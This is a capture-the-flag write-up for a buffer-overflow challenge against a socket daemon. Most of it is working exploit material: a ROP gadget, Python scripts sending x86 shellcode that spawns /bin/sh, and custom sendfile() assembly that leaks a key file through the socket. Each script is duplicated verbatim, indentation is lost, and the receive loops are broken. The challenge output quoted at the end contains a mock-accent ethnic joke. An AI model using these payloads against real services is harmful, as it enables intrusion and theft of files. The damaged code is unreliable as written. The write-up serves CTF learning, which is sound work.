Stage 13
Question: KimJongUnd
We lost many time on this exploitation challenge for many reasons.
The vulnerability is when you input the command line after the password, there is a buffer overflow and you can control EIP.
Our buffer is on the stack so we spend some time finding a nice ROP gadget like this one:
.text:08048850 55 push ebp
.text:08048851 89 E5 mov ebp, esp
.text:08048853 FF E4 jmp esp
We have around 50 bytes available. Since we are in a forked daemon using socket we will first go for a shellcode that will read the command from the socket and output back to the socket.
#!/usr/bin/env python
import socket
import sys
import time
if len(sys.argv) != 3:
print '\nUsage:\t./ [host] [port]'
host = sys.argv[1]
port = int(sys.argv[2])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Creating Socket
s.connect((host, port)) # Connecting to socket
crash = '\x90' * 524
crash += '\x50\x88\x04\x08'
crash += '\x31\xc9\x31\xdb\xb3\x04\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf5'
crash += '\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80'
crash += " exec cat key\n"
crash += '\x01' * 300 # NOP Sled 25 bytes
s.send('%s\n' %crash); # Sending Evil buffer (ShellCode)
while 1:
line = s.recv(4096)
if not line:
print 'Received', repr(line)
import socket
import sys
import time
if len(sys.argv) != 3:
print '\nUsage:\t./ [host] [port]'
host = sys.argv[1]
port = int(sys.argv[2])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Creating Socket
s.connect((host, port)) # Connecting to socket
crash = '\x90' * 524
crash += '\x50\x88\x04\x08'
crash += '\x31\xc9\x31\xdb\xb3\x04\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf5'
crash += '\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80'
crash += " exec cat key\n"
crash += '\x01' * 300 # NOP Sled 25 bytes
s.send('%s\n' %crash); # Sending Evil buffer (ShellCode)
while 1:
line = s.recv(4096)
if not line:
print 'Received', repr(line)
But this is a decoy… after investigating, a mount -o bind has been done after the daemon has been started and is obscuring the true content of the key.
So this solve this challenge, we need to notice that, at start, the daemon open a file description to the key. This file descriptor relates to the true key file and is stored in a very convenient global variable.
.text:08048B67 8B 5D 08 mov ebx, [ebp+fd]
.text:08048B6A C7 44 24 04 00 00 00 00 mov dword ptr [esp+4], 0 ; oflag
.text:08048B72 C7 04 24 11 90 04 08 mov dword ptr [esp], offset file ; "/home/kimjongun/key"
.text:08048B79 E8 6E FA FF FF call _open
.bss:0804B0A4 ; int fd
.bss:0804B0A4 ?? ?? ?? ?? fd dd ? ; DATA XREF: sub_8048860+1C
Where to send the content of this file ? To the open socket of course, which is in a global variable as well:
.bss:0804B0A0 ?? ?? ?? ?? dword_804B0A0 dd ? ; DATA XREF: sub_8048B60+2D
Given the limited space available, I went with a custom shellcode using the kernel syscall sendfile():
[SECTION .text]
global _start
jmp short ender
xor eax, eax ;clean up the registers
mov [esp], eax
mov al, 0xbb ; sendfile() syscall
mov ecx, [0x804B0A0] ; out-fd
mov ebx, [0x804B0A4] ; in-fd
mov edx, esp ; *offset
mov esi, 256 ; size
int 0x80
xor eax, eax
mov al, 1 ;exit the shellcode
xor ebx,ebx
int 0x80
call _start
dd 0
A little trick, we need to ask sendfile() to start from offset 0 of the file, otherwise it will only work the first time.
Python code to send payload:
#!/usr/bin/env python
import socket
import sys
import time
if len(sys.argv) != 3:
print '\nUsage:\t./ [host] [port]'
host = sys.argv[1]
port = int(sys.argv[2])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Creating Socket
s.connect((host, port)) # Connecting to socket
crash = '\x90' * 524
crash += '\x50\x88\x04\x08'
crash += '\xeb\x24\x31\xc0\x89\x04\x24\xb0\xbb\x8b\x0d\xa0\xb0\x04\x08\x8b\x1d\xa4\xb0\x04\x08\x89\xe2\xbe\x00\x01\x00\x00\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xd7\xff\xff\xff\x00\x00'
s.send('%s\n' %crash); # Sending Evil buffer (ShellCode)
while 1:
line = s.recv(4096)
if not line:
print 'Received', repr(line)
import socket
import sys
import time
if len(sys.argv) != 3:
print '\nUsage:\t./ [host] [port]'
host = sys.argv[1]
port = int(sys.argv[2])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Creating Socket
s.connect((host, port)) # Connecting to socket
crash = '\x90' * 524
crash += '\x50\x88\x04\x08'
crash += '\xeb\x24\x31\xc0\x89\x04\x24\xb0\xbb\x8b\x0d\xa0\xb0\x04\x08\x8b\x1d\xa4\xb0\x04\x08\x89\xe2\xbe\x00\x01\x00\x00\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xd7\xff\xff\xff\x00\x00'
s.send('%s\n' %crash); # Sending Evil buffer (ShellCode)
while 1:
line = s.recv(4096)
if not line:
print 'Received', repr(line)
$ python 2645
Received 'Password: '
Received 'Welcome shitty wok, may a taka oda prez?\n'
Received 'Goddamn Mongorians! Quit breakin down my shitty wall!!!\n!All_Hail_Fearress_Reader!\n'
Key: !All_Hail_Fearress_Reader!